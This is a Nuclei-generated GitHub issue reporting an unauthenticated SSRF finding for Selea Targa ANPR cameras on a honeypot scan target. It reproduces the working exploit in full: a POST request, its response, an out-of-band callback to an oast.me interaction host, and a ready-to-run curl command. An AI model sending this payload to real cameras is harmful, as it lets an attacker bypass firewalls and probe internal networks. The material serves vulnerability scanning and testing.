mkrs2404 / tickets


Selea Targa IP OCR-ANPR Camera - Unauthenticated SSRF (targa-camera-ssrf) found on honey.scanme.sh #47

Closed mkrs2404 closed 1 month ago

mkrs2404 commented 4 months ago

Details: targa-camera-ssrf matched at honey.scanme.sh

Protocol: HTTP

Full URL: https://honey.scanme.sh/cps/test_backup_server?ACTION=TEST_IP&NOCONTINUE=TRUE

Timestamp: Tue Apr 30 19:28:18 +0530 IST 2024

Template Information

Name: Selea Targa IP OCR-ANPR Camera - Unauthenticated SSRF
Authors: gy741
Tags: targa, ssrf, oast, iot, camera, selea
Severity: high
Description: An unauthenticated Server-Side Request Forgery (SSRF) vulnerability exists in several functionalities of the Selea ANPR camera. The application uses the user-supplied POST JSON parameters 'ipnotify_address' and 'url' to construct an image request or to perform a DNS check for IP notification. Because these parameters are not validated, an attacker can specify an external domain and force the application to make an HTTP request to an arbitrary destination host. An external attacker can use this, for example, to bypass firewalls and enumerate services and hosts on the internal network through the affected application.

Request

POST /cps/test_backup_server?ACTION=TEST_IP&NOCONTINUE=TRUE HTTP/1.1
Host: honey.scanme.sh
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/602.4.8 (KHTML, like Gecko) Version/10.0.3 Safari/602.4.8
Connection: close
Content-Length: 250
Accept: */*
content-type: application/json
Accept-Encoding: gzip

{"test_type":"ip","test_debug":false,"ipnotify_type":"http/get","ipnotify_address":"http://coofgv4mjeun8ktjo61g7erc3q4okuicn.oast.me","ipnotify_username":"","ipnotify_password":"","ipnotify_port":"0","ipnotify_content_type":"","ipnotify_template":""}

Response

HTTP/1.1 200 OK
Connection: close
Content-Length: 584
Content-Type: application/json
Date: Tue, 30 Apr 2024 13:58:12 GMT

POST /cps/test_backup_server?ACTION=TEST_IP&NOCONTINUE=TRUE HTTP/1.1
Host: honey.scanme.sh
Accept: */*
Accept-Encoding: gzip
Connection: close
Content-Length: 250
Content-Type: application/json
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/602.4.8 (KHTML, like Gecko) Version/10.0.3 Safari/602.4.8

{"test_type":"ip","test_debug":false,"ipnotify_type":"http/get","ipnotify_address":"http://coofgv4mjeun8ktjo61g7erc3q4okuicn.oast.me","ipnotify_username":"","ipnotify_password":"","ipnotify_port":"0","ipnotify_content_type":"","ipnotify_template":""}

Interaction Data

HTTP interaction from 67.205.158.113 at coofgv4mjeun8ktjo61g7erc3q4okuicn

Interaction Request

GET / HTTP/1.1
Host: coofgv4mjeun8ktjo61g7erc3q4okuicn.oast.me
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1

Interaction Response

HTTP/1.1 200 OK
Connection: close
Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Content-Type, Authorization
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Server: oast.me
X-Interactsh-Version: 1.1.8

<html><head></head><body>nciuko4q3cre7g16ojtk8nuejm4vgfooc</body></html>

References:

CURL command

curl -X 'POST' -d '{"test_type":"ip","test_debug":false,"ipnotify_type":"http/get","ipnotify_address":"http://coofgv4mjeun8ktjo61g7erc3q4okuicn.oast.me","ipnotify_username":"","ipnotify_password":"","ipnotify_port":"0","ipnotify_content_type":"","ipnotify_template":""}' -H 'Accept: */*' -H 'Host: honey.scanme.sh' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/602.4.8 (KHTML, like Gecko) Version/10.0.3 Safari/602.4.8' -H 'content-type: application/json' 'https://honey.scanme.sh/cps/test_backup_server?ACTION=TEST_IP&NOCONTINUE=TRUE'

Generated by Nuclei v3.2.5